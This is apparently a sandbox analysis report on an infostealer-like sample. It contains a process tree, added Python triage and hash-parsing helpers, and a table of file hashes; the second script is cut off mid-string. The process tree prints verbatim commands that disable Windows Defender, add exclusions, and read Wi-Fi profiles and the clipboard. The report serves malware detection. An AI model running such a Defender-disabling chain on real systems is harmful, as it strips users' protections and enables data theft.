C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:1324
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵PID:5356
-
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵PID:5408
-
-
-
-
C:\Users\Admin\Downloads\notaloggertrustmebro.exe"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"1⤵
- Executes dropped EXE
PID:3708 -
C:\Users\Admin\Downloads\notaloggertrustmebro.exe"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"2⤵
- Drops startup file
- Executes dropped EXE
PID:1064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵PID:4516
-
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵PID:4512
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:5800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:5008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "3⤵PID:2912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵PID:5784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"4⤵
- Command and Scripting Interpreter: PowerShell
PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:5512
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:2240
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name3⤵PID:1300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:436
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:5580
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵PID:3360
-
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵PID:2756
-
-
-
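Every instance of the sample in the tree above runs the same sequence: fingerprint the host over WMIC (csproduct UUID, OS caption, CPU, GPU, RAM), grab the saved Wi-Fi profiles and the clipboard, then weaken Defender and add exclusions from one cmd.exe /c chain. Two details of that chain matter when reading it: the single & separators run the next command regardless of exit code, whereas the one && before `powershell Set-MpPreference -SubmitSamplesConsent 2` only runs it on success, and that sub-command has no PowerShell child under either cmd.exe in the tree (an inference from the tree, not something the report states); and `%USERPROFILE%\Local` is not a standard profile folder, but the `%USERPROFILE%\AppData` path exclusion and the `.exe` extension exclusion already cover anything the sample writes under the profile. The Python below is an added triage helper, not sandbox output and not code from the sample: it takes the command lines shown above (copied inline as constructed sample input), unwraps the cmd.exe /c wrapper, splits the chain on & and && outside double quotes the way cmd.exe does, and tags each sub-command. The ATT&CK IDs are labels chosen here, not the report's own mapping.

```python
"""Classify the command lines from a sandbox process tree by behaviour.

Added triage example for this report; not sandbox output and not code
from the sample. Unwraps cmd.exe /c "..." wrappers, splits the inner
& / && chain outside double quotes (as cmd.exe does) and tags each
sub-command. ATT&CK IDs are labels only; map them to your own scheme.
"""
import re
from dataclasses import dataclass

# Constructed sample input: command lines copied from the process tree in
# this report. The three instances of the sample issue identical commands,
# so one copy of each is enough.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"',
    r'C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"',
    r'C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"',
    r'''C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "''',
    r'C:\Windows\system32\cmd.exe /c "wmic os get Caption"',
    r'wmic cpu get Name',
    r'C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"',
    r'C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"',
]


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique ID, used as a label
    category: str   # short tag for grouping
    value: str      # the matched setting, path, query or command
    command: str    # the sub-command it came from


_CMD_WRAPPER = re.compile(r'^\s*"?[^"]*?\bcmd\.exe"?\s+/[cC]\s+"(.*)"\s*$', re.DOTALL)
_DEFENDER_OFF = re.compile(
    r'-Disable\w+\s+\$true'
    r'|-EnableControlledFolderAccess\s+Disabled'
    r'|-EnableNetworkProtection\s+AuditMode'
    r'|-MAPSReporting\s+Disabled'
    r'|-SubmitSamplesConsent\s+(?:NeverSend|2)\b',
    re.IGNORECASE)
_EXCLUSION = re.compile(
    r'(?:Add|Set)-MpPreference\s+-Exclusion(?:Path|Extension|Process)\s+[\'"]?([^\'"\s]+)',
    re.IGNORECASE)
_WMIC = re.compile(r'\bwmic(?:\.exe)?\s+(.+)$', re.IGNORECASE)
_POWERSHELL = re.compile(r'\bpowershell(?:\.exe)?\b', re.IGNORECASE)
_WIFI = re.compile(r'\bnetsh\b.*\bwlan\b.*\bshow\s+profiles\b', re.IGNORECASE)


def unwrap_cmd(cmdline: str) -> str:
    """Return the payload of cmd.exe /c "..." (outer quotes stripped), else the line itself."""
    m = _CMD_WRAPPER.match(cmdline)
    return m.group(1) if m else cmdline


def split_chain(command: str) -> list[str]:
    """Split on & and && that sit outside double quotes; cmd.exe treats both as separators."""
    parts, buf, in_quotes, i = [], [], False, 0
    while i < len(command):
        ch = command[i]
        if ch == '"':
            in_quotes = not in_quotes
        if ch == '&' and not in_quotes:
            parts.append(''.join(buf))
            buf = []
            if i + 1 < len(command) and command[i + 1] == '&':
                i += 1  # swallow the second & of &&
        else:
            buf.append(ch)
        i += 1
    parts.append(''.join(buf))
    return [p.strip() for p in parts if p.strip()]


def classify(command: str) -> list[Finding]:
    """Tag one sub-command; a single command can yield several findings."""
    out = []
    if 'mppreference' in command.lower():
        for m in _DEFENDER_OFF.finditer(command):
            out.append(Finding('T1562.001', 'defender-off', m.group(0), command))
        for m in _EXCLUSION.finditer(command):
            out.append(Finding('T1562.001', 'defender-exclusion', m.group(1), command))
    if _POWERSHELL.search(command):
        out.append(Finding('T1059.001', 'powershell', command.split()[0], command))
    if 'get-clipboard' in command.lower():
        out.append(Finding('T1115', 'clipboard', 'Get-Clipboard', command))
    if _WIFI.search(command):
        out.append(Finding('T1016', 'wifi-profiles', command, command))
    m = _WMIC.search(command)
    if m:
        out.append(Finding('T1082', 'wmic-discovery', m.group(1).strip(), command))
    return out


def analyse(cmdlines) -> list[Finding]:
    """Unwrap, split and classify every command line."""
    return [f for line in cmdlines for sub in split_chain(unwrap_cmd(line)) for f in classify(sub)]


def by_category(findings) -> dict[str, list[str]]:
    """Group finding values by category, preserving first-seen order."""
    grouped: dict[str, list[str]] = {}
    for f in findings:
        grouped.setdefault(f.category, []).append(f.value)
    return grouped


if __name__ == '__main__':
    for cat, values in by_category(analyse(SAMPLE_CMDLINES)).items():
        print(f'{cat:20} {len(values):2}  {values}')
```

Feed it the command-line column of your own EDR or Sysmon event ID 1 export instead of SAMPLE_CMDLINES; the splitter is what makes the difference, because a rule that only inspects the parent cmd.exe line sees one event where the tree shows four PowerShell children.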
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 152B
MD5:    ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1:   a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA256: 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512: e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

Filesize: 152B
MD5:    f53207a5ca2ef5c7e976cbb3cb26d870
SHA1:   49a8cc44f53da77bb3dfb36fc7676ed54675db43
SHA256: 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23
SHA512: be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

Filesize: 6KB
MD5:    fd55948dc6d984a216e62bbba4c84301
SHA1:   abec860c0605d808392525f50ee072365d652e8a
SHA256: fa0964c189ec3ec87a3f179fa667ffe5e9320b80fb7ea10a14ecb2baa3a952d2
SHA512: c7331f216f75927f03d08d225b7d7a461f7c405fe50f1077f2a5bff1aa821f657ab0a9da717a77f796f5fab2788500638987e7b98b23fef25b7a75dbb6a858f7

Filesize: 6KB
MD5:    3b41af5ae5003b09000ffda4e970a793
SHA1:   faa51868d63bac0ef152d40e607ad46e91287799
SHA256: 4f214025e99f475fecb51acc045f4272e4a94dfd07abec8e68b694b3a6f64a3d
SHA512: fe337d8ef05d30bbcf86771b707022e0849d3a6758a7538ce4fc35d2959de162a7d5b8e5eee9fdb9177ca336ff2d15f8b9c2bc4370c2f6b9c5599cbb928cba68

Filesize: 16B
MD5:    6752a1d65b201c13b62ea44016eb221f
SHA1:   58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize: 11KB
MD5:    4eca4b4f418d7aa7a80ab68008f2bdd1
SHA1:   939ad87f238e656ba3bb341936f07394b7f3a65a
SHA256: 6b393a4dc54ebdd33595917fa729d61d7b2d8b04780e311f34a986af4fc90ccf
SHA512: 1d3209917fc447c6aa098242945ce18841d932b49a9def8f2fe6b1ff3c00c88ade0a864aac7f9b331b428076503fe60adb0d5951a178d9a95de7d784449fd2e7

Filesize: 11KB
MD5:    6ca3ff80c83c2d1a53ccd4af87667485
SHA1:   343b79c51fd6394ca7b39edfd9edc916f0b67866
SHA256: 230969181ec1e624dbcd661880a98ffee24f30975de971da43b8dfeb83ffd501
SHA512: 7feea6a28f6b77a77891a0ac7d34b5567ccdb9fdeed623587bf179d9f560e45f8991350cae99b0fdcca94aa1b47252629c72155e4309dfd2d502fc654f1893b4

Filesize: 944B
MD5:    96ff1ee586a153b4e7ce8661cabc0442
SHA1:   140d4ff1840cb40601489f3826954386af612136
SHA256: 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512: 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Filesize: 49B
MD5:    357c18b5c470aa5214819ed2e11882f9
SHA1:   262726528ac6ece5ef69b48cbf69e9d3c79bbc2d
SHA256: e04233c3a65810f382471c2c1484cc71df6f2078d56bd91f478ed99790ac11f5
SHA512: a84eaa0f8466ef145e765b3c340120a7947aad6ded63c301be5a5c4dea15f603ae0a295c8d7d9828a8f660edfa058edf96abc6950eebbbafe3af402a4b37d683

Filesize: 23B
MD5:    de9ec9fc7c87635cb91e05c792e94140
SHA1:   3f0fbeaff23a30040e5f52b78b474e7cb23488ab
SHA256: aac2a87a65cbbe472000734bd6db5c76f0ffed78e80928f575d5573f3ac94d0f
SHA512: a18ff0f277d880cf249fe7ef20fa026fd8126121fbb6f1de33d3d4a08d37084c662724053c6e8e2035aa7c347000e14a9c12698017ac72b327db6473d6e4af56

Filesize: 18B
MD5:    3f86226eca1b8b351d9c5b11dcdbcdfa
SHA1:   576f70164e26ad8dbdb346cd72c26323f10059ac
SHA256: 0d50f046634b25bcfc3ffb0a9feff8ab43e662c8872df933cb15b68050a5bb8c
SHA512: 150d95510e0f83ef0e416e1a18663a70f85ff4d09c620fcf355b18df3e939d232054a5be5bbb1b22e050167e61c243d7e89e13c0770cfedbae49b1b8e10d8753

Filesize: 91B
MD5:    5aa796b6950a92a226cc5c98ed1c47e8
SHA1:   6706a4082fc2c141272122f1ca424a446506c44d
SHA256: c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512: 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

Filesize: 23B
MD5:    5638715e9aaa8d3f45999ec395e18e77
SHA1:   4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256: 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512: 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

Filesize: 116KB
MD5:    be8dbe2dc77ebe7f88f910c61aec691a
SHA1:   a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256: 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512: 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Filesize: 48KB
MD5:    f8dfa78045620cf8a732e67d1b1eb53d
SHA1:   ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256: a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512: ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Filesize: 37KB
MD5:    c4e239aa9041cd3a67d03b0476cd9b95
SHA1:   4d7d2ee3320e140d94f41cd3224b2740edb156df
SHA256: 617eb50897916095a22494d07e5dbe6c427331c9f983b0d4c1a7279513cd6743
SHA512: 6168531b24813504adfa56be4a83b7220bc2a3ef4cf9fc67eb72d10f921331927bd4fe4e27b5527cd8b6148071f0f93930000d735338a5e9351fe3b4a7bc35ad

Filesize: 48KB
MD5:    ba261cfff9d982be6c64982215f937bc
SHA1:   435ebd684adc41d632e35513b0b8511a7d19ee33
SHA256: 1ac8ca1558305fcdd975b7846c48e006500629bb5639634958e70b51c62762c5
SHA512: b7597a1ea8118e8604b32f7c4f38ffed05748c18180866570f8820e84840ed4256df1bf5802896aed947ca4b7b99483a48401fe485da48d578ff01457bcfcb0c

Filesize: 71KB
MD5:    5ecaaa900fdabc7207cf938e23f5d956
SHA1:   40d4d67e8ba1737caa5e0ab69cb08d7f7f4215ae
SHA256: b2ee6d811dc1d94a761ffe691006e23ad00adeb9b710c4f8e7d59f177401aaba
SHA512: ff03c361adaf5e14101083e9374e8b85f0b74bda2b6c05a0739237b397fa02dbfa8b6b8cadc4ded1d9b64e8ae63d040e1b6ed2cc3947451b6c3f58ed7bfc1cd0

Filesize: 59KB
MD5:    be90d040a4bb2b0ac6a57298c56405e9
SHA1:   08fa52b63ec9d9a1a4daa3caba22bae81f794ad3
SHA256: 3c52af0a44d768a2cdaaa2163d438f09a5913fec85a01b7d591116e9fbd743b1
SHA512: 5f300657bee15555d54dcc99355c6fbd42a4c05dc76cd3c942daa16895043c50cbd15a77b77d594819a9ed10fe73cdf98fbb49b6a87081b317f66e3ba06ed873

Filesize: 105KB
MD5:    e359f1c12b1f0708770c4e35f225f424
SHA1:   62e55f31fda96b465761f2f28f079741d9df2bf7
SHA256: c5ff76699e65aba4c629cc060532447d3643fe1c7b34266f8f2bfdd6396d6613
SHA512: b884f6d54c123652621654b2bd0679cf0750ed955eee62aacb94e46e55778465c46d76e5b9ea8361a673165c4989044a6c19ac2e9af31f2e877ebbd3e2698e5f

Filesize: 35KB
MD5:    b67c993f7fb4fdc89874d3d2be56ac8e
SHA1:   242409935bd0b75d20d39164983573f490f02c03
SHA256: 794ff644b85bbc5bbbeef42eea7997dc51c6cbb4eeb3605beef3a5c8243e1146
SHA512: a1c3ec87d23cb6f111c3e6a16da227f3ee223162cddf866975e060c1b49fb580f5a4c210b4bf483d56f2b666afa39b52951ddd34a8ee21ca0156a299a444073a

Filesize: 86KB
MD5:    a03ab3a9a7d7486e4a4333453e0baef9
SHA1:   a2fc8b3bb3b3c869b0c43d584f2c667cbbb5a25f
SHA256: b5dffb38a8a869abef827789f12d75ceb6125335be12a7a990c78d8e8417b674
SHA512: e2b341474b60b0f144c03e40ba473c93fc4378a7dcb0385875bec52839d9f5b9e87944801014df177fca740eeb15718da5ae810c66051b785c37c6bac9c51276

Filesize: 27KB
MD5:    36785e939d8a7f067f457ad18f69b498
SHA1:   7da5c6c0d81cb16bd142e79afa345c803e5ecc84
SHA256: 96403254e1592b2930d2c3510ca37e49ed22f0de2d2fa8a7924b25e5585667f4
SHA512: afd1e021f9b42a3ff720e965863a14bd8bf48ec97c1116e4acb8a193a7e4fe12cbe2ea555cac09423bcc5126b193211d6469a830f01fa1b0c80d07b40169f0b4

Filesize: 33KB
MD5:    a8b083be8a5b90ad5962df143b6a5c75
SHA1:   f69fb708e97125c907f966e0ca3bb858673b0421
SHA256: fd338e1c6596e96d16bd1faffd233a30c759c006bbe4c4032c0b99a07180d477
SHA512: 8a56b857e91da2a7d67fc38254abe2d20fdb56fe39e4983cbcb916bec76b695c98e65b19d9f24f7f2bb5d75d6c1a3e10e27f8a0827387e4613c5027b87552888

Filesize: 26KB
MD5:    d21ed27b16a8ccfe002eea93ce4b9129
SHA1:   6dfbdac6480e56c84292c489bd217b080c001299
SHA256: 46f3f3e83a917bfc8733064ec2389343d0adf325e4feff3e45a9ba3038510cbe
SHA512: 2c38f36c51094d113385e6816c2e4ac1a96094b983398639b2c25be806120383e3421abaf6446c30bd6e797c0a74f965f5a7a293f1f0d836a3b82e0265b70099

Filesize: 44KB
MD5:    0f65c39912ad241bb256e83cef9b6040
SHA1:   f9d183b1fdbe99521aecd98781479765596d76d6
SHA256: 2dd34b7b49caf4a1f269f48beaf48deee7130932daf8e7fe2b48f5cc901de1da
SHA512: 4669add920acfa8387fee674ed9e52a0fc780cc45f3a1fe1cc0717b754bf7f759b23c1ecc181bb3c7e779be118f04848c1c023e7a51639bba19d0046c84f7cbc

Filesize: 57KB
MD5:    9a5b2c0290df382355e1205966f5e824
SHA1:   44cb64affc35515c97c73aaccb0457aa132f0a04
SHA256: ba72af58df3609949a449ba6a432f8bec0afeac93b512a305c98afc12471a0ae
SHA512: 79c7ef5bc5110b78498ff5b11ef18422563409eb7eb6010c5ff435e98f6ed56d794246a6f80296bb0d00ad3e9814eca01f8ed72eeb3dd844cc40e6c7ddf2826b

Filesize: 65KB
MD5:    339143cd70861741a54eb9e7e3a04916
SHA1:   e5b9ed5687ae698671c6cbd67555c791978807cd
SHA256: 8fcbe509bc6214d12207698d4df074d1a05d4f1c91afb7340f296e51d2045509
SHA512: 6313b5be550e132881f81b65d5e6ef6b265e95e2068115c026876ac0bdec3029b87093fca254ad816b7030ea4853378b6d5798b908c003bb5544a13f69ea426b

Filesize: 24KB
MD5:    353e11301ea38261e6b1cb261a81e0fe
SHA1:   607c5ebe67e29eabc61978fb52e4ec23b9a3348e
SHA256: d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899
SHA512: fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5

Filesize: 28KB
MD5:    f27f263f60aede353e417b00f56cd21e
SHA1:   f9748f73d137878f2a852649c1723dd43e4e44db
SHA256: f9cdf7c964f0ee756df4a63daabe652743a06b7a5b8009c7c0a8d1445e5793af
SHA512: ba7b5878791d91e2574a855dd3564c51bc34221932be87791a3b0045fbe01c494e92fe6f014d64c309486f0d3476df178e0d53a98326484c7d761014ae1cc604

Filesize: 1.3MB
MD5:    8dad91add129dca41dd17a332a64d593
SHA1:   70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256: 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512: 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

Filesize: 1.6MB
MD5:    ee4ebac30781c90c6fb6fdffa6bdd19a
SHA1:   154eada82a520af85c1248b792edb716a72a19e0
SHA256: d9c01ab4545d4681ab057b572eb8590defd33bc44527bb4ef26a5f23cadbfd03
SHA512: fc9457046f262595024971047f06df5b5865e53536e8fc5d35a6e5c9da494e99cd2dbeb9d6d17e37b51169b88ed6cb6e5931474dbbab7350e1b4da8e7ee0576c

Filesize: 29KB
MD5:    ae513b7cdc4ee04687002577ffbf1ff4
SHA1:   7d9a5eb0ac504bc255e80055d72e42ccb7ab7b4d
SHA256: ed18fc7eee1bf09d994d8eba144e4e7d1e6a030ba87888001eea550d7afffada
SHA512: 9fcb24debfaf035a3604a2a9abece0655424f981ebb0afef14b9674e57030dea8c5c230ca8cc13c10de8422777b4c549002350f62b9259c486cca841d9c81634

Filesize: 222KB
MD5:    a160ff459e97bf9514ef28281dbc6c81
SHA1:   730510497c9a4d28444e5243bc5f44a91643d725
SHA256: 2674c58e05448f8b60d7b2182bbcd2efe386d4b7b1104dd1f753112638cb8e00
SHA512: 04651ca40a806f0596434e0bbe30c7458daf316174ecdbf142cbddc21dbac5f0db58dc284bce5b7c6949545720021b2bd1f768ebf8c2e379a17dc6dc2fb2b46d

Filesize: 88KB
MD5:    cd422a6f821d5cfc56dc0f26b2b600cc
SHA1:   5529327b32d2b11195946da66be134dad8e6a120
SHA256: 60a47ac9c1674198998338cf3caef2325bb722e62934310653f9dd01a1cb4109
SHA512: bfb5565ef94a06fe4149292ff21284f6ded1e11e6d3e23a110fdcc8118c60d3a14aba3726802945f90b2981d605098a99df5821c2bedfa4c2b5cc38ac8d681e5

Filesize: 66KB
MD5:    79b02450d6ca4852165036c8d4eaed1f
SHA1:   ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256: d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512: 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

Filesize: 1.7MB
MD5:    8f9e3a154ef42634941f6b8b0e7596d5
SHA1:   bf6a86ed4fe5ef5cd6fa3481a57415abd7d89fa1
SHA256: cc947a9fcd6d569d60960758a6226e27dfe9ed8ca2cec3105ae99a711b1be3a9
SHA512: 42c2a57324c32fdf00ed671c8efe419e4dcb3842f630a2fddc9714285c27a6ca5d9e065ea31e0a7a5834cc8c78855984627891dc376a637815ac27f0cdcee519

Filesize: 25KB
MD5:    f55e6cc581308799114c0b3376bff92c
SHA1:   85e9ef00240cf38b8afa434a285396b1355555b6
SHA256: f05fe1c21959ee25d30aaade30afaaf34fbd99524bdfb3ebee3cf8643ae5d1b6
SHA512: f0d48d228cc292c05712d3eb2b06125c78aefdf481ef245b6ef547c1794e8ca10c19a12dccdb77d1026a5352d0b79be223bdbeb5b08627f8bc9b88757bb587b9

Filesize: 644KB
MD5:    c349095f35ef7831444a5612f86e856c
SHA1:   d158144d557777cc2464cbd39ddf8c15be48be2f
SHA256: bfe78fe2b54df778c0d62144b1308f1f149bed79ea6bd628ffd76cbc5406cd1a
SHA512: 9bd17fc8ce0057e58d18c6ed327225636cab6599b2d743ee159f3987a9d79a761a240ec6133f503991e09746540b0c595708043e1d31d3934b185b117583b737

Filesize: 295KB
MD5:    1e73c365bb5c3b10def5b168c17cf33d
SHA1:   dbcee0e7c69c1e33804d45d677e32b7d00fcf4d5
SHA256: 6c2c45ef24c6797ee92997417dd142e4447d410fae63c7969db615caed9327ba
SHA512: cc0a051a0ccba78829205af134d4195143a767cd80dccb74a9580ac32a8a1e3223febf2ee4d278e89003dd28fe3ea6bbe9ab292c9050c1e24a52a7142436463f

Filesize: 60B
MD5:    d17fe0a3f47be24a6453e9ef58c94641
SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 16.1MB
MD5:    1e79b60d975dc664b5affeab606a41fb
SHA1:   19f9d849813263e2271af58cf8784ef0fce7ae8e
SHA256: b2bdaf007e47f5a4eca9248a1bec1aac17c381c0ee6c160709c0226ec8a66c37
SHA512: f2d39968a61d74aa7b282da39cdf6e3282ff05a78449380fc71421c88ba752376aaebc0fa34e5a707bfabcdaa91c526da623a2e5feb0369db9b677a263607b46

Filesize: 20KB
MD5:    42c395b8db48b6ce3d34c301d1eba9d5
SHA1:   b7cfa3de344814bec105391663c0df4a74310996
SHA256: 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512: 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
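The hash table above lists every file the run wrote, one record per file and no file names, so the only way to use it is as a set of digests. The Python below is an added example, not part of the report: it parses the record format exactly as a sandbox page renders it (label and digest fused together, or separated by a colon, size on the "Filesize" line or on the next one), converts sizes to bytes, rejects any digest with the wrong length or a non-hex character, and returns only the SHA256 values that pass every check. The sample input is constructed: three records copied from this report plus one deliberately broken record (its MD5 is the well-known digest of the empty string and its SHA256 is truncated) to exercise the validation path.

```python
"""Parse the Downloads hash table of a sandbox report into checked IOC records.

Added example for this report, not part of the sandbox output. Handles the
page's plain-text form: "Filesize" (size on the next line) or "Filesize: 6KB",
then MD5/SHA1/SHA256/SHA512 lines with or without a colon after the label.
Every digest is checked for length and hex alphabet so that a mangled copy
never reaches a blocklist.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

DIGEST_LENGTHS = {'MD5': 32, 'SHA1': 40, 'SHA256': 64, 'SHA512': 128}
_UNIT = {'B': 1, 'KB': 1024, 'MB': 1024 ** 2, 'GB': 1024 ** 3}
_HASH_LINE = re.compile(r'^(MD5|SHA1|SHA256|SHA512):?\s*(\S+)$', re.IGNORECASE)
_SIZE_LINE = re.compile(r'^(\d+(?:\.\d+)?)\s*(B|KB|MB|GB)$', re.IGNORECASE)

# Constructed sample: the first, third and 16.1MB records of this report,
# plus one deliberately broken record (MD5 of the empty string, SHA256
# truncated to 8 hex chars, SHA1 and SHA512 absent).
SAMPLE_TEXT = """\
-
Filesize
152B
MD5ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA2565009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
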